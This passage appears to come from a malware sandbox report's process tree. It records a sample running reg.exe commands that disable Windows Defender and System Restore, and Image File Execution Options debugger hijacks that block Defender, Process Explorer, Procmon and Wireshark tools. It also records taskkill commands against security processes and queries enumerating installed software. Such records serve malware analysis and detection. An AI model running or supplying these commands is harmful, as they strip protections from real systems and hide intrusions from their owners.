  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1976
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1296
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1680
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1936
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1632
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:344
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1624
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:804
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1488
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1628
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1168
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1312
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1112
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1388
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1572
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1564
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1704
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:848
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:592
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:1380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1576
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1624
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1260
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:1760
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1560
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1672
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:1372
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:1100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1952
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:1696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1948
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:1840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:2028
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1936
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1576
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2032
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1528
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1712
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1480
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:776
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1496
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1832
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:796
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1992
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1384
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1984
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2016
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1936
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:332
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1052
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:528
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1968
- - C:\Windows\system32\reg.exe
